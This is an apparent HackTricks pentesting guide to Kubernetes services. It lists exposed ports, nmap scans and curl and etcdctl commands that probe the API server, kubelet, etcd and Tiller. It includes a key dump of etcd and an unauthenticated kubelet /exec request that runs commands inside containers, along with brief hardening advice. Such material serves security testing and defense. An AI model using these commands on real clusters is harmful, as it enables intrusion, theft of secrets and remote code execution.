HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Pentesting Kubernetes Services
Support HackTricks and get benefits!
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
Kubernetes uses several specific network services that you might find exposed to the Internet or in an internal network once you have compromised one pod.

Finding exposed pods with OSINT

One way could be searching for Identity LIKE "k8s.%.com" in crt.sh to find subdomains related to kubernetes. Another way might be to search "k8s.%.com" in github and search for YAML files containing the string.

How Kubernetes Exposes Services

It might be useful for you to understand how Kubernetes can expose services publicly in order to find them:

Finding Exposed pods via port scanning

The following ports might be open in a Kubernetes cluster:
Port
Process
Description
443/TCP
kube-apiserver
Kubernetes API port
2379/TCP
etcd
โ€‹
6666/TCP
etcd
etcd
4194/TCP
cAdvisor
Container metrics
6443/TCP
kube-apiserver
Kubernetes API port
8443/TCP
kube-apiserver
Minikube API port
8080/TCP
kube-apiserver
Insecure API port
10250/TCP
kubelet
HTTPS API which allows full mode access
10255/TCP
kubelet
Unauthenticated read-only HTTP port: pods, running pods and node state
10256/TCP
kube-proxy
Kube Proxy health check server
9099/TCP
calico-felix
Health check server for Calico
6782-4/TCP
weave
Metrics and endpoints
30000-32767/TCP
NodePort
Proxy to the services
44134/TCP
Tiller
Helm service listening

Nmap

1
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <pod_ipaddress>/16
Copied!

Kube-apiserver

This is the API Kubernetes service the administrators talks with usually using the tool kubectl.
Common ports: 6443 and 443, but also 8443 in minikube and 8080 as insecure.
1
curl -k https://<IP Address>:(8|6)443/swaggerapi
2
curl -k https://<IP Address>:(8|6)443/healthz
3
curl -k https://<IP Address>:(8|6)443/api/v1
Copied!
Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:

Kubelet API

This service run in every node of the cluster. It's the service that will control the pods inside the node. It talks with the kube-apiserver.
If you find this service exposed you might have found an unauthenticated RCE.

Kubelet API

1
curl -k https://<IP address>:10250/metrics
2
curl -k https://<IP address>:10250/pods
Copied!
If the response is Unauthorized then it requires authentication.
If you can list nodes you can get a list of kubelets endpoints with:
1
kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do
2
ip=$(echo $node | awk '{print $1}')
3
port=$(echo $node | awk '{print $2}')
4
echo "curl -k --max-time 30 https://$ip:$port/pods"
5
echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd
6
done
Copied!

kubelet (Read only)

1
curl -k https://<IP Address>:10255
2
http://<external-IP>:10255/pods
Copied!

etcd API

1
curl -k https://<IP address>:2379
2
curl -k https://<IP address>:2379/version
3
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
Copied!

Tiller

1
helm --host tiller-deploy.kube-system:44134 version
Copied!
You could abuse this service to escalate privileges inside Kubernetes:

cAdvisor

Service useful to gather metrics.
1
curl -k https://<IP Address>:4194
Copied!

NodePort

When a port is exposed in all the nodes via a NodePort, the same port is opened in all the nodes proxifying the traffic into the declared Service. By default this port will be in in the range 30000-32767. So new unchecked services might be accessible through those ports.
1
sudo nmap -sS -p 30000-32767 <IP>
Copied!

Vulnerable Misconfigurations

Kube-apiserver Anonymous Access

By default, kube-apiserver API endpoints are forbidden to anonymous access. But itโ€™s always a good idea to check if there are any insecure endpoints that expose sensitive information:

Checking for ETCD Anonymous Access

The ETCD stores the cluster secrets, configuration files and more sensitive data. By default, the ETCD cannot be accessed anonymously, but it always good to check.
If the ETCD can be accessed anonymously, you may need to use the etcdctl tool. The following command will get all the keys stored:
1
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
Copied!

Kubelet RCE

The Kubelet documentation explains that by default anonymous access to the service is allowed:
The Kubelet service API is not documented, but the source code can be found here and finding the exposed endpoints is as easy as running:
1
curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/'
2
โ€‹
3
Path("/pods").
4
Path("/run")
5
Path("/exec")
6
Path("/attach")
7
Path("/portForward")
8
Path("/containerLogs")
9
Path("/runningpods/").
Copied!
All of them sounds interesting.

/pods

This endpoint list pods and their containers:
1
curl -ks https://worker:10250/pods
Copied!

/exec

This endpoint allows to execute code inside any container very easily:
1
# Tthe command is passed as an array (split by spaces) and that is a GET request.
2
curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} \
3
-d 'input=1' -d 'output=1' -d 'tty=1' \
4
-d 'command=ls' -d 'command=/'
Copied!
To automate the exploitation you can also use the script kubelet-anon-rce.
To avoid this attack the kubelet service should be run with --anonymous-auth false and the service should be segregated at the network level.

Checking Kubelet (Read Only Port) Information Exposure

When the kubelet read-only port is exposed, the attacker can retrieve information from the API. This exposes cluster configuration elements, such as pods names, location of internal files and other configurations. This is not critical information, but it still should not be exposed to the internet.
For example, a remote attacker can abuse this by accessing the following URL: http://<external-IP>:10255/pods

References

Kubernetes Pentest Methodology Part 2
CyberArk
Attacking Kubernetes through Kubelet
F-Secure Labs
โ€‹
A digital transformation tailored to your organization is unique. It also comes with its risks. Defend yourself against hackers. Get protection before it's too late. Talk to the professionals at Securityboat:
Let's connect - Securityboat
Securityboat - Frontline of Your Business
Support HackTricks and get benefits!